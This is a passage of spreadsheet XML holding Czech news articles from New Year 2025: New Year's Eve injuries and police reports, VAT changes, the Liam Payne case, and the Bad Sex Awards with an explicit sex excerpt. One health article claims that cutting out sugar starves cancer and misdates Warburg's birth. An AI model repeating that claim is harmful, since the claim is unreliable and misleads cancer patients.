osvětlenou vycházku,“ zve Klouček. Kompletní program najdete zde. Reportáž z loňské Noci tuleních pásů je tady. Foto: Tomáš Binter/Skialpuj.cz Your email address will not be published. Required fields are marked * Save my name, email, and website in this browser for the next time I comment. Δ Autor: Tomáš Nohejl Autor person Tomáš Nohejl</t>
  </si>
  <si>
    <t>113</t>
  </si>
  <si>
    <t>20250101_185_3695724071_e8430b0dab3e090b963d.html</t>
  </si>
  <si>
    <t>e8430b0dab3e090b963d</t>
  </si>
  <si>
    <t>Přelom roku v Baťovce: první miminko, zranění pod vlivem alkoholu i problémy se zažíváním</t>
  </si>
  <si>
    <t>Přelom roku v Baťovce: první miminko, zranění pod vlivem alkoholu i problémy se zažíváním 1. 1. 2025 | 12:19 Autor: Kateřina Nosková Foto: KNTB ZLÍN – Silvestrovská noc byla na urgentním příjmu Krajské nemocnice T. Bati ve Zlíně co do závažnosti úrazů celkem klidná, podle zdravotníků nedošlo k žádným vážným úrazům nebo poraněním. První miminko roku 2025 přišlo ve zlínské porodnici na svět půl hodiny po půlnoci. Prim hrál jako obvykle v tomto ročním období alkohol . Na traumatologii bylo ošetřeno kolem půlnoci a těsně po ní celkem 10 lidí, z toho devět pod vlivem alkoholu včetně jednoho, který kombinoval alkohol s návykovou látkou. „ Většina z nich po pádech, kdy naštěstí utrpěli pouze povrchová poranění typu oděrky a rány, které jim lékaři zašili a propustili je domů. Vypíchnout by se dal případ muže, který popsal, že po vypití 13 panáků tvrdého alkoholu „proběhl“ skleněnou výplní dveří,“ informovala mluvčí KNTB Dana Lipovská. Hospitalizován zůstal pouze muž, který má po rvačce zlomenou horní čelist a nos. „ T en ček al na vystřízlivění a operaci,“ zmínila Lipovská. Po půlnoci bylo dost plno také na interní pohotovosti. „ L ékaři ošetřili celkem devět lidí s průjmovými problémy, křečemi v břiše, problémy se zažíváním. Nikdo z nich nebyl hospitalizován,“ pokračovala Lipovská. V 0:29 hodin přišlo v porodnici KNTB na svět první miminko nového roku 2025. „Je to holčička Natálie, je ze Zlína , a váží 3890 gramů,“ upřesnila na závěr Lipovská. 1. 1. 202512:19 Autor: Kateřina Nosková Autor person Kateřina Nosková Rubrika transition_slide Co se děje</t>
  </si>
  <si>
    <t>20250101_186_3700655877_2d3e829d8147c37df89e.html</t>
  </si>
  <si>
    <t>2d3e829d8147c37df89e</t>
  </si>
  <si>
    <t>Letošní Silvestr byl pro policii rušnější než loni. Hlavní roli sehrál alkohol 2. 1. 2025 | 7:00 Autor: Kateřina Nosková Ilustrační foto ZLÍNSKÝ KRAJ - Letošní Silvestr byl pro policisty ve Zlínském kraji o něco rušnější než ten loňský. Oslavy příchodu nového roku se však obešly bez mimořádných událostí. „ Na náročnou službu jsme byli tak jako každý rok připraveni, posílili jsme výkon služby,“ informovala policejní mluvčí Simona Kyšnerová. Od šesté hodiny večerní do šesté hodiny ranní přijali policisté na operačním středisku Krajského ředitelství policie Zlínského kraje bezmála 140 oznámení, která se týkala především rušení nočního klidu a přestupků proti veřejnému pořádku nebo občanskému soužití. „ U většiny těchto skutků sehrál roli alkohol . Lidé si také často stěžovali, že je obtěžuje hluk od odpalované zábavní pyrotechniky,“ pokračovala Kyšnerová. Během Silvestra a prvních hodin Nového roku nemuseli policisté řešit žádnou závažnější dopravní nehodu. „ V průběhu noci jsme však narazili na čtyři podnapilé řidiče, kteří jsou podezřelí ze spáchání trestného činu ohrožení pod vlivem návykové látky. Tři z nich nadýchali nad jedno promile, jeden pak nad dvě promile,“ přiblížila policejní mluvčí. Okolo páté hodiny ranní došlo ve Zlíně k fyzickému napadení mezi dvěma podnapilými cizinci, kdy jeden z mužů skončil v nemocnici. „Okolnostmi tohoto incidentu se nyní zabývají zlínští policisté,“ dodala Simona Kyšnerová. 2. 1. 20257:00 Autor: Kateřina Nosková Autor person Kateřina Nosková</t>
  </si>
  <si>
    <t>20250101_187_3695693832_32e139906a824283524d.html</t>
  </si>
  <si>
    <t>32e139906a824283524d</t>
  </si>
  <si>
    <t>Záchranáři: V Plzeňském kraji byly silvestrovské oslavy klidné</t>
  </si>
  <si>
    <t>Záchranáři: V Plzeňském kraji byly silvestrovské oslavy klidné Silvestrovské a novoroční oslavy hodnotí záchranáři v Plzeňském kraji jako klidnější než v předchozích letech. Řekla to mluvčí Andrea Divišová. Poslední noc roku 2024 se obešla bez těžkých zranění i bez vážných dopravních nehod. "Výjezdy, které byly spojené s vítáním nového roku, nebyly tak závažné a jejich počet čítal kolem dvaceti. Úrazy způsobené zábavní pyrotechnikou jsme zaznamenaly pouze dva, a to lehčího charakteru. Další události typu úrazy v opilosti či napadení, se pohybovaly v jednotkách," popsala Divišová. Silvestrovské oslavy se v Plzeňském kraji obešly bez mimořádných událostí i z pohledu policie. "Během noci jsme přijali množství oznámení, která se týkala zejména případů osob pod vlivem alkoholu," řekla krajská policejní mluvčí Michaela Raindlová. Hasiči od silvestrovského večera do novoročního rána vyjížděli v Plzeňském kraji podle informací zveřejněných na jejich webových stránkách ke zhruba dvěma desítkám událostí. Nejčastěji se jednalo o hořící odpad v popelnicích a některé výjezdy se týkaly také technické pomoci, jako je otevření bytu nebo záchrana lidí z výtahu. Podle policie se silvestrovská noc v Plzeňském kraji rovněž obešla bez vážné dopravní nehody. Autor: Iva Kokešová Autor Iva Kokešová Rubrika transition_slide Zprávy pro Plzeňský kraj</t>
  </si>
  <si>
    <t>4910</t>
  </si>
  <si>
    <t>5770</t>
  </si>
  <si>
    <t>20250101_188_3709211918_c138a4ee4b921ce0ebda.html</t>
  </si>
  <si>
    <t>c138a4ee4b921ce0ebda</t>
  </si>
  <si>
    <t>Na Slovensku se od 1. 1. 2025 mění sazby DPH</t>
  </si>
  <si>
    <t>Na Slovensku se od 1. 1. 2025 mění sazby DPH Připravte se na změnu sazeb dabě z přidané hodnoty (DPH). Od 1. ledna 2025 dochází ke změnám sazeb DPH na Slovensku . 01.01.2025 | Finanční správa ČR (FS ČR) Nové sazby přinášejí úpravy pro širokou škálu zboží a služeb. Podrobnosti o změnách naleznete v přílohách č. 7 a 7a zákona o DPH. Ilustrační fotografie Přehled změn DPH v roce 2025: Základní sazba: 23 % (dříve 20 %) První snížená sazba: 19 % potraviny elektrická energie restaurační služby spojené s podáváním nealkoholických nápojů ( alkohol méně než 5 % objemu) Druhá snížená sazba: 5 % vybrané potraviny léky a zdravotnické pomůcky knihy (včetně online verzí) ubytovací a vybrané restaurační služby vstupné na sportovní akce, do fitness center a další služby dle zákona Přizpůsobte své účetní a fakturační systémy novým sazbám.</t>
  </si>
  <si>
    <t>7070</t>
  </si>
  <si>
    <t>20250101_189_3695639510_5e7bfd897100f2f9fa14.html</t>
  </si>
  <si>
    <t>5e7bfd897100f2f9fa14</t>
  </si>
  <si>
    <t>Cukr chutná také rakovině</t>
  </si>
  <si>
    <t>Cukr chutná také rakovině 1.1.2025 1,4K Metabolismem rakovinných buněk se intenzivně zabýval německý biochemik, fyziolog a lékař Otto Heinrich Warburg (1183-1970). V roce 1931 získal za svůj výzkum Nobelovu cenu. Zjistil, že cukr jako palivo v motoru pohání růst rakoviny. Byl přesvědčen, že ačkoli to není snadné, každý onkologický pacient by dokázal vyhladovět rakovinu na smrt. Co Warburg o rakovině a cukru zjistil Růst zhoubných rakovinných buněk je umožněn spalováním glukózy, tak zvanou glykolýzou, která je hlavním zdrojem výživy rakovinné buňky. Dokážou to daleko rychleji než zdravé buňky a navíc k tomu nepotřebují kyslík, bez kterého se zdravé buňky neobejdou. Na tomto základě došel doktor Warburg k závěru, že při rakovině tělo namísto normálního využívání kyslíku tvoří energii fermentací cukrů. Domníval se proto, že pokud pacient ve své stravě eliminuje cukr, rakovina se nerozvine a bude vyhladověna doslova k smrti. Kterých potravin se to týká? O eliminaci cukru se jistě snáz hovoří, než se realizuje. Jde hlavně o bílý cukr, ale i jiné jeho druhy – jako jsou třeba třtinový, hroznový apod. – a cukrářské výrobky. Omezit je potřeba brambory, instantní potraviny, bílé pečivo, sladké nápoje, ale také med. Zcela se vyhnout všem potravinám s přídavkem glukózo-fruktózového sirupu. Ten je např. v Coca Cole , ale i v dalších desítkách potravin. Mnoho výrobců ho přidává třeba do koblih, závinů apod. Na obalu pak nemusejí přiznávat přímo cukr. Skryjí ho pod jinými názvy, jako jsou kukuřičný či právě glukózo-fruktózový sirup. Nejlepším pravidlem je proto vyhýbat se zpracovaným potravinám a polotovarům a přednost zásadně dávat nezpracovaným potravinám. To znamená konzumovat především následující: čerstvou zeleninu čerstvé nezpracované maso, pokud možno v biokvalitě – totálně vyloučit uzeniny a jiné masné výrobky vyřadit veškeré sušenky, koláče, čokolády a jiné sladkosti ovoce jen omezeně a jen takové, které neobsahuje velký podíl cukru žádné mléko a mléčné výrobky (kromě přírodních bílých jogurtů nebo tvarohu při protinádorové dietě doktorky Budwigové) pečivo jen velmi omezeně, pouze celozrnné s nízkým glykemickým indexem žádný alkohol Je rovněž lepší se alespoň dočasně přestat stravovat v restauracích, kde si nejste jisti, z jakých surovin jsou nabízené pokrmy. Vhodnější je domácí příprava jídla. ========= Autor: ProKondici.cz || podle | ProKondici.cz Rubrika transition_slide Zdraví</t>
  </si>
  <si>
    <t>236</t>
  </si>
  <si>
    <t>20250101_19_3698073086_9c0758b8fa7f91409a69.html</t>
  </si>
  <si>
    <t>9c0758b8fa7f91409a69</t>
  </si>
  <si>
    <t>Průzkum: Předsevzetí si dává 80 procent lidí, nejčastější se týkají hubnutí</t>
  </si>
  <si>
    <t>Průzkum: Předsevzetí si dává 80 procent lidí, nejčastější se týkají hubnutí Novoroční předsevzetí si dává podle průzkumu 80 procent Čechů. Nejčastější jsou zdravotní plány, téměř třetina lidí chce zhubnout, čtvrtina změnit své stravování a zhruba každý pátý plánuje zlepšit spánek, zpevnit postavu nebo pravidelně sportovat. Naopak spíš vzácností jsou předsevzetí týkající se duševního zdraví. Data vyplývají z průzkumu agentury Ipsos pro společnost Pluxee, která se zabývá zaměstnaneckými benefity. Zároveň v průzkumu více než polovina dotázaných přiznala, že předsevzetí nedodrží. „Hubnutí v předsevzetích vede ve všech věkových kategoriích. Podíl se ale zvyšuje s vyšším věkem," uvedla k výsledkům průzkumu Tereza Knířová z Pluxee. Častěji je nižší hmotnost cílem žen (33,2 pct) než mužů (25,6 pct). Pevnější tělo je častěji cílem mladých, v kategorii 25 až 34 let by si ho přálo přes 28 procent respondentů, mezi lidmi nad 55 let jen 12 procent. V průzkumu odpovídal na konci letošního listopadu reprezentativní vzorek 1000 osob z řad zaměstnanců. Obézní bude podle odhadů Světové zdravotnické organizace ( WHO ) v roce 2030 více než třetina Čechů. Ministerstvo zdravotnictví ( MZd ) to uvedlo v letos vydaném strategickém dokumentu Zdraví 2030. Před pěti lety byl jejich podíl asi 26 procent žen a necelá třetina mužů. Odborníci doporučují pohyb minimálně 30 minut ve střední intenzitě pětkrát týdně. Podle průzkumu to dokáže dodržovat zhruba čtvrtina dotázaných. Zhruba stejný podíl populace ale přiznává, že sportuje méně než jednou týdně. Nejčastěji si lidé vybírají aktivity, jako je procházka či výlet, běhání, cyklistika nebo jóga nebo jiné cvičení doma. Zhruba pětina lidí v průzkumu přiznala, že se většinou zdravě nestravuje. Častěji se v průzkumu k prohřeškům v oblasti zdravé stravy přiznávali muži, ženy naopak častěji tvrdily, že si na zdravé stravě dávají záležet. Třetina respondentů přiznává, že si dá pivo či víno jednou nebo dvakrát týdně. Odborníci odhadují, že problém s alkoholem má v ČR milion lidí. O vánočních svátcích a kolem silvestra často podle průzkumu, na který v tiskové zprávě upozornil institut SYRI, lidé sáhnou po sklence častěji. „ Alkohol ve formě přípitků nebo speciálních sezonních nápojů je nedílnou součástí vánočních tradic a je pro mnoho z nás obtížné jej vynechat. Stejně jako s vánočním stravováním je to však málokdy opravdu do sytosti jako spíše mnohem častěji přes míru," uvedl v tiskové zprávě expert Národního institutu SYRI a Masarykovy univerzity Albert Kšiňan . Více relaxace či wellness by si přálo v následujícím roce do svého života zařadit 15 procent lidí, dvě procenta respondentů má předsevzetí chodit na terapii nebo koučink. Duševních potíží přitom v ČR v posledních letech přibývá, roste počet hospitalizací kvůli nim i četnost předepisování antidepresiv. Mezi nejčastějšími důvody pro nedodržení předsevzetí lidé v průzkumu uváděli nedostatek času (41 pct), energie (40,5 pct), přílišné pracovní vytížení (28 pct) nebo nedostatek peněz (20,7 pct). Autor: ČTK Autor ČTK</t>
  </si>
  <si>
    <t>41960</t>
  </si>
  <si>
    <t>32520.000000000004</t>
  </si>
  <si>
    <t>20250101_190_3695632816_89a044191194687707e6.html</t>
  </si>
  <si>
    <t>89a044191194687707e6</t>
  </si>
  <si>
    <t>Silvestrovské oslavy v Ústeckém kraji: utrhané prsty, požár domu i auta, alkohol</t>
  </si>
  <si>
    <t>Silvestrovské oslavy v Ústeckém kraji : utrhané prsty, požár domu i auta, alkohol Hasiči v Ústeckém kraji vyjížděli od večera 31. prosince do rána 1. ledna k 52 událostem. Hlavně k požárům odpadu a popelnic. Museli ale také zlikvidovat požár dutiny stromu v Brtníkách na Šluknovsku nebo auta v žatecké ulici Otakara Březiny . Na Roudnicku hořel rodinný dům. close info Zdroj: se svolením HZS Ústeckého kraje zoom_in Požár rodinného domu v Černěvsi na Roudnicku. „Zasahovali jsme u požáru rodinného domu v Černěvsi. Při zásahu nedošlo ke zranění. Škoda přesáhne sedm milionů korun. Příčina vzniku požáru je v šetření,” uvedli hasiči. Záchranáře a zdravotníky v kraji hodně zaměstnala zábavní pyrotechnika. Tržné rány, popáleniny, utržené prsty, ale i amputace ruky. Žatecko a Lounsko Kvůli pyrotechnice vyjížděli desetkrát, další výjezdy, a ne málo, kvůli konzumaci velkého množství alkoholu nebo poranění v opilosti. Zaměstnávali je i běžné případy, které nesouvisely s oslavami. Dvě zranění způsobená pyrotechnikou byla vážná, jedno dokonce velmi vážné. Jednalo se o mladíka z Mostecka. „Pacient byl transportován do ústeckého traumacentra a uveden do umělého spánku. Měl devastující poranění způsobené zábavní pyrotechnikou,“ uvedl mluvčí záchranářů Prokop Voleník. Podle informací policie mladík přišel o prsty a část dlaně. play_fill Mostecko Další zranění způsobená pyrotechnikou byla středně vážná nebo lehká. Několik bylo utržených článků prstů. Další lidé mají popáleniny nebo tržné rány. Zhruba čtyři desítky lidí převezli záchranáři do nemocnic kvůli nadměrnému požití alkoholu . Napilno měli také policisté. „Během silvestrovské noci jsme přijali 206 telefonních hovorů na tísňovou linku 158. V loňském roce to bylo 200,” uvedla policejní mluvčí Ilona Gazdošová. „Policisté v Ústeckém kraji řešili zpravidla slovní i fyzické potyčky, kde zpravidla hlavní roli sehrál alkohol . Několik osob vyhrožovalo sebevraždou, ti skončili v péči lékařů. V souvislosti se zábavní pyrotechnikou došlo k vážnému úrazu osoby v Mostě . Nalezená petarda měla za následek utržené prsty a část dlaně,” dodala policejní mluvčí. Autor: Hynek Dlouhý Autor Hynek Dlouhý</t>
  </si>
  <si>
    <t>20250101_191_3695664479_39c7d55d378be87a1856.html</t>
  </si>
  <si>
    <t>39c7d55d378be87a1856</t>
  </si>
  <si>
    <t>Opilec proběhl sklem, rváč skončil s polámanou čelistí. To byly silvestrovské případy na urgentu</t>
  </si>
  <si>
    <t>Opilec proběhl sklem, rváč skončil s polámanou čelistí. To byly silvestrovské případy na urgentu 1. 1. 2025 Kateřina Špačková Zlínský kraj , Zprávy Ilustrační foto ZLÍN – Silvestrovská noc byla na urgentním příjmu zlínské Baťovy nemocnice poměrně klidná. Ačkoliv nedošlo k závažným úrazům, našli se jedinci, kteří při bujarých oslavách neznali míru a nutně potřebovali lékařskou pomoc. Jako obvykle hrál prim alkohol . Na traumatologii ošetřili kolem půlnoci 10 lidí, z toho 9 pod vlivem alkoholu včetně jednoho, který byl i pod vlivem drog. „Většina z nich po pádech, kdy naštěstí utrpěli pouze povrchová poranění typu oděrky a rány, které jim lékaři zašili a propustili je domů. Vypíchnout by se dal případ muže, který popsal, že po vypití 13 panáků tvrdého alkoholu proběhl skleněnou výplní dveří,“ popsala mluvčí nemocnice Danuše Lipovská. Staňte se členy FB skupiny Život ve Zlínském kraji a žádná zpráva z kraje vám neunikne. Sledujte nás na síti X, kde pro vás připravujeme plejádu pestrých zpráv. Hospitalizován zůstal pouze muž, který má po rvačce zlomenou horní čelist a nos. Ten čeká na vystřízlivění a operaci. Po půlnoci se dveře netrhly ani na interní pohotovosti, kde lékaři ošetřili celkem 9 lidí s průjmovými problémy, křečemi v břiše a problémy se zažíváním. Nikdo z nich nemusel být hospitalizován. Zlínský kraj ZLÍN – Ve Zlíně vrcholí přípravy návrhu Inteligentního telematického systému, jehož cílem je zvýšit plynulost a bezpečnost městské dopravy. Dojde přitom k instalaci komunikační technologie C2X, […] Ukrajina ZLÍN – Mají chuť pomáhat a nepohrdnou ani náročnou prací. To mají společné studenti i zaměstnanci zlínské univerzity, kteří se od začátku konfliktu na Ukrajině […] KRIMI Autor: Kateřina Špačková Autor person Kateřina Špačková</t>
  </si>
  <si>
    <t>20250101_192_3922106922_f52c46cd286e8fb5e036.html</t>
  </si>
  <si>
    <t>f52c46cd286e8fb5e036</t>
  </si>
  <si>
    <t>Šperkařský festival a rukodělné trhy 2025 - Kroměříž</t>
  </si>
  <si>
    <t>Šperkařský festival a rukodělné trhy 2025 - Kroměříž 08.02.2025 - 09.02.2025 Výstaviště Největší prodejní veletrh šperků a kreativních výrobků na Moravě . Návštěvníci se mohou těšit na úžasnou prodejní výstavu šperků , kovové a skleněné bižuterie, drahých kamenů a minerálů. Chybět nebude ani bohatý výběr handmade výrobků od předních českých firem. Zakoupit můžete například překrásné svíčky, keramické výrobky, originální drátované zboží, dřevěné a papírové výrobky, textilní a dřevěné hračky, pletené a háčkované výrobky, lepené vitráže, originální oblečení pro děti i dospělé a mnoho dalšího. Výstava nabídne skutečně širokou škálu produktů pro každého. Aby návštěvníci mohli i sami tvořit a rozvíjet svou kreativitu, budou mít možnost zakoupit z širokého sortimentu materiálů , jako je bavlněná příze, korálky a komponenty, galanterie, umělecké štětce a fixy, floristické materiály a další. Každý si tak bude moci vybrat to, co potřebuje pro své vlastní tvůrčí projekty. Akce se koná za každého počasí. Veškerá výstavní plocha je zastřešena. Po celou dobu akce v provozu Dětský svět. OTEVÍRACÍ DOBA : S obota 8 . 2 . 202 5 9 .00 - 17 .00 N eděle 9 . 2 . 202 5 9.00 - 1 7 .00 VSTUPN É : Dospělí : 100,-Kč Důchodci nad 65 let, ZTP: 80,- Kč Děti do 150 cm, ZTP/P + doprovod : ZDARMA Parkovné: 50,- Kč ADRESA MÍSTA KONÁNÍ : K Výstavišti 4069/8, 767 01 Kroměříž 1 Více informací na: https://www.hobbyvystaviste.cz/ Tel: 604 670 861 « zpět na seznam položek Autor: Atlas Česka, s.r.o. Rubrika transition_slide Kalendář akcí</t>
  </si>
  <si>
    <t>1270</t>
  </si>
  <si>
    <t>20250101_193_3695584759_fd976a48324d4a629c25.html</t>
  </si>
  <si>
    <t>fd976a48324d4a629c25</t>
  </si>
  <si>
    <t>Záchranáři v Praze měli na silvestra rušnější noc než před rokem</t>
  </si>
  <si>
    <t>Záchranáři v Praze měli na silvestra rušnější noc než před rokem Zdravotničtí záchranáři v Praze měli na silvestra rušnější noc než před rokem. Vyjeli k 348 případům, s oslavami příchodu nového roku souvisela stovka. Zranění zábavní pyrotechnikou bylo devět, řekl dnes ČTK mluvčí zdravotnické záchranné služby Karel Kirs. Nejzávažnějším případem na Staroměstském náměstí byl podle něj úraz hlavy, se kterým pacient skončil v nemocničním traumacentru. Policisté v centru Prahy pokutovali za zakázané odpalování pyrotechniky téměř 50 lidí, hlavně cizinců. Vyjížděli také k potyčce na ubytovně. Požárů od zábavní pyrotechniky bylo v hlavním městě o silvestrovské noci méně než o rok dřív, vyplývá z informací hasičů. Na silvestra 2023 zasahovali pražští záchranáři během noční směny u 229 událostí. Úrazů pyrotechnikou bylo sedm. Z centra města loni odvezli do nemocnic 13 lidí. To je podobné číslo jako letos. „Ve speciálu Golem bylo ošetřeno celkem 27 pacientů, z nichž 13 bylo transportováno do zdravotnického zařízení. Nejzávažnější případ představoval úraz hlavy, který si vyžádal napojení pacienta na umělou plicní ventilaci a následný transport do traumacentra,“ uvedl Kirs na sociální síti X . S používáním zábavní pyrotechniky v částech Prahy , kde je to zakázané, nebyly podle policejní mluvčí Evy Kropáčové před půlnocí žádné zásadní problémy, s příchodem nového roku se to ale změnilo hlavně v okolí Václavského a Staroměstského náměstí . „V průběhu noci policisté přistihli přímo při odpalování pyrotechniky v centru města bezmála 50 osob, z nichž se v drtivé většině jednalo o cizince. Těmto přestupcům policisté na místě uložili pokutu v řádech až několika tisíc korun,“ uvedla mluvčí na policejním webu. V použití pyrotechniky byl nicméně podle ní loňský silvestr jedním z nejklidnějších. Po půlnoci podle Kropáčové výrazně přibylo také oznámení o potyčkách, konfliktech a dalších událostech spojených s pitím alkoholu . Policisté například zadrželi muže, který v Praze 10 poškodil bezpečnostním kladívkem okna u deseti zaparkovaných vozidel, a také opilého muže, který na Smetanově nábřeží hodil skleněnou láhev po policejním vozidle. Při potyčce během silvestrovských oslav na ubytovně jeden člověk utrpěl řezné poranění. „V současné chvíli věc prošetřujeme pro podezření z trestného činu pokus těžké újmy na zdraví, ze kterého je podezřelá osmnáctiletá dívka,“ uvedla Kropáčová. Policisté podle ní během noci také několikrát asistovali záchranné službě při resuscitací lidí a vypátrali dva lidi, kteří vyhrožovali sebevraždou. Požárů způsobených neodborným používáním pyrotechniky bylo v Praze o silvestrovské noci 33, nejčastěji hořely odpadkové koše, porosty a krabice od pyrotechniky, uvedl mluvčí pražských hasičů Vojtěch Sosna. Před rokem bylo takových požárů 46, ještě o rok dřív 55. Většina požárů od pyrotechniky se podle Sosny koncentrovala do doby mezi první a druhou hodinou ranní. „Větší zásah si vyžádal požár předmětů na balkoně v ulici Spálená, který byl rovněž způsoben pyrotechnikou,“ uvedl. Hasiče ve službě během silvestrovské noci posílili jejich kolegové z dobrovolných jednotek, dodal. Autor: ČTK Autor ČTK</t>
  </si>
  <si>
    <t>6180</t>
  </si>
  <si>
    <t>20250101_194_3695580102_1633d24c1d4d8f6bcf3f.html</t>
  </si>
  <si>
    <t>1633d24c1d4d8f6bcf3f</t>
  </si>
  <si>
    <t>Ze smrti Liama Payna bylo obviněno pět lidí, dva z nich zpěvákovi údajně dodávali drogy</t>
  </si>
  <si>
    <t>Ze smrti Liama Payna bylo obviněno pět lidí, dva z nich zpěvákovi údajně dodávali drogy Argentinský soudce potvrdil obvinění pěti lidí v souvislosti se smrtí Liama Payna, bývalého člena hudební skupiny One Direction . Soud dvěma z nich nařídil preventivní vězení za to, že mu dodávali drogy. Buenos Aires 11:12 1. ledna 2025 Zpěvák Liam Payne zemřel ve věku 31 let | Foto: Charles Platiau | Zdroj: Reuters Podle americké stanice NPR je jednou ze dvou osob, na které byla nařízena preventivní vazba (forma vyšetřovací vazby), je zaměstnanec hotelu v Buenos Aires , kde Payne pobýval až do své smrti po říjnovém pádu z balkonu svého pokoje. Zpěvák Liam Payne zemřel po pádu z balkonu v Argentině . Bývalému členovi One Direction bylo 31 let Číst článek Druhou osobou byl číšník, s nímž se Payne seznámil v restauraci. Policista, který si přál nebýt jmenován jako podmínku, aby mohl hovořit o rozsudku, uvedl, že oba čelí obvinění z dodávání drog a musí se dostavit k soudci. Další tři osoby z neúmyslného zabití, včetně podnikatele, který byl s Paynem v Argentině , a dvou manažerů hotelu. Úředník uvedl, že jim nebyla nařízena preventivní vazba. Soudkyně Laura Bruniardová podle BBC uvedla, že si nemyslí, že první tři jmenovaní plánovali nebo chtěli Paynovu smrt, ale jejich jednání ohrozilo zpěvákův život. 31 letý Payne spadl 16. října z balkonu svého pokoje ve třetím patře hotelu v luxusní čtvrti Palermo v argentinském hlavním městě. Podle pitvy zemřel na následky mnohačetných zranění a vnějšího krvácení. Jeho pohřeb se konal 20. listopadu v britském Amershamu severozápadně od Londýna . Prokurátoři uvedli, že Payneovo toxikologické vyšetření ukázalo, že v jeho těle byly v době před smrtí „stopy alkoholu , kokainu a předepsaného antidepresiva.“ Payneova pitva ukázala, že jeho zranění nebyla způsobena sebepoškozením ani fyzickým zásahem jiných osob. V dokumentu také stojí, že se při pádu nechránil, což naznačuje, že mohl být v bezvědomí. Argentinská prokuratura také vyloučila, že by Payne zemřel sebevraždou. Jiří Klečka</t>
  </si>
  <si>
    <t>20250101_195_3695584754_5d7c5c0e21f54049f4e8.html</t>
  </si>
  <si>
    <t>5d7c5c0e21f54049f4e8</t>
  </si>
  <si>
    <t>Bad Sex Awards 2024: Nejhorší literární scény napsali i Viewegh a Třeštíková. A nebyli v tom sami</t>
  </si>
  <si>
    <t>Bad Sex Awards 2024: Nejhorší literární scény napsali i Viewegh a Třeštíková . A nebyli v tom sami Laureáti Bad sex in fiction award 2024: Michal Viewegh , Radka Třeštíková a Bianca Bellová • Zdroj: Blesk.cz; Profimedia.cz Vážené čtenářky, vážení čtenáři, sex (v nejnovější české próze) je náš, abychom citovali legendární Černé anděly skupiny Lucie. S následující pasáží, „dělá dobře mně i tobě“, však po přečtení příslušných ukázek z děl letošního desatera finalistů nejspíš nebudete souhlasit. Zatímco předloni se v našem výročním výběru nejméně zdařilých sexuálních scén masívně znásilňovalo a loni především masturbovalo, letos máme tu čest zejména s eroticky neschopnými muži. S panicem, starcem, možná asexuálem a možná tak trochu incelem; s muži ochablými, frustrovanými, nevyzrálými, nanicovatými… Co to visí ve vzduchu? A ani jeden z excerpovaných sexuálních aktů v pomyslných milostných deníčcích aktérů (tedy těch, kteří koitus přežili) jistě nepředstavuje příjemnou zkušenost. Ani jediný! Snad tento ročník reflexích BAD SEX IN FICTION AWARD nijak nevypovídá o stavu společnosti a náladě mezi námi. V opačném případě se můžeme jít zahrabat. A to nikoli do peřin. Připomeňme úvodem, že ocenění za „mizerně napsané, povrchní či nadbytečné pasáže popisující sex“ začali roku 1993 výročně udělovat Auberon Waugh , šéfredaktor britského měsíčníku Literary Review , a jeho kolegyně, literární kritička Rhoda Koenigová. První ročník Bad Sex in Fiction Awards ( BSA ) v Reflexu oproti tomu proběhl roku 2011, kdy jsme se do potřísněných trenek a vlhkých spoďárů české literatury ponořili s tehdejším kolegou Luďkem Staňkem a na stupně vítězů postavili Jaroslava Balvína ( Lásko, teď! ), za něj tramtará s Václavem Havlem Ireny Obermannové ( Tajná kniha ) a pak obligátního Michala Viewegha ( Další báječný rok ). Od roku 2016 vám poskytujeme BSA eskort servis pravidelně, a protože tuzemský rybníček je malý a vylovený, opakují se v naší anticeně za blbě napsané sentence sexuálního charakteru stále stejná jména. A zatímco Britové z Literary Review , kteří svého času BSA udělili i takovým velikánům slova, jako jsou (nebo byli) John Updike , Tom Wolfe , Norman Mailer , Jonathan Littell , Morrissey či Nancy Hustonová , se zalekli politicky korektního prostředí a „zraňující“ ocenění před čtyřmi lety zrušili, Reflex se tělesných šťáv nadále neštítí a vytrval. S kolegou spoluautorem, literárním kritikem Kryštofem Ederem, dle některých prudérních čtenářů neděláme čest své alma mater, katedře bohemistiky pražské filozofické fakulty , ale rádi každoročně své dobré jméno pokládáme na oltář špatného sexu. Smějeme se, vzrušujeme, divíme, dávíme. A víme, že to jde i dobře, a těší nás, když v tuzemské próze nebo poezii zachytíme parádní prasáž, erotiku fantastickou, příhodně podanou. Po zesnulém přeborníkovi erotických (pravda, poněkud perverzních) scén, romanopisci Václavu Kahudovi , převzala žezlo živelná Hana Lundiaková, mistryně popisu zejména ženské (auto)-erotiky. Hned na desáté straně jejích letošních Planetek (vyd. Odeon), v živočišné první povídce, se dočkáme mj. rozkošné hry se dvěma dlouhými svícemi ze šestiramenného svícnu a dvou protagonistčiných vrcholů. „On myslí na to, jak ji klátil / ona myslí na to, jak se milovali“ i v podmanivé stodvacetistránkové básnické skladbě Aleše Berného, jeho pozdním debutu s názvem K Helmovskému jezu (vyd. Argo). Erotika se touto dlouhou básní vine ve všemožných svých podobách, je splavná a skvělá i syrová a toporná, plná šikany, odmítání a nenaplněných tuh. Uh. Ale pojďme už k těm našim neukojencům a neukojenkám. Opět se mimochodem poštěstilo, že mezi nominovanými máme vyvážený poměr žen a mužů, a konečně je polovice, tedy pětice scén viděna očima hrdinky, ba dokonce jí (ve čtyřech případech) vyprávěna, takže genderové komise celého světa zajásají s námi. Poslední léto Kolik je ti let? zeptá se a poprvé mi tyká. Osmnáct, odpovídám, a tobě třicet šest. Odvede mě k besídce. Je prázdná stejně jako minulý rok. Nechá mě stát ve dveřích a dojde pro lehátko, na kterém venku lehává Anna. Chvíli trvá, než se mu ho podaří dostat dovnitř. Pak za námi zavře dveře. Já se posadím, on se sám svlékne. V přítmí pomalu postupujícího letního večera vidím jeho siluetu s výrazně vystupujícím pérem. Vyhrne mi šaty, stáhne kalhotky. Holím se dohladka a vidím, jak si mou úpravu rychle prohlédne. Mám pocit, že ho to na milisekundu zarazí. Anna se asi holí jinak anebo se možná neholí vůbec. Tipuju, že lidi tak třicet plus se neholí vůbec. Doktor je taky jak Ezau. Pak se mi vklíní mezi nohy, pomůže si prstama a už je uvnitř. Stará prkna podlahy skřípají v jiném rytmu, než v jakém je před rokem rozezníval Tobiáš svým bláznivým pobíháním v kruhu. Nedokážu se soustředit na doktorův penis ve vlastním podbřišku, necítím ho tam. Myšlenky mi odbíhají k vrzajícímu dřevu. K poskakujícímu dítěti. Násilím se je snažím přivést zpátky do potemnělé besídky, mezi svoje stehna. Používáš antikoncepci? ptá se doktor, a než stačím odpovědět, rychle se vytáhne ven a postříká máminy růžové šaty. Celou noc se snažím připomenout si, jaký to byl pocit, cítit ho v sobě, ale nevím. Nemám žádný pocit. Jako po každém sexu cítím mezi třísly klubíčko tepla. Nic víc. Nijak se to neliší od 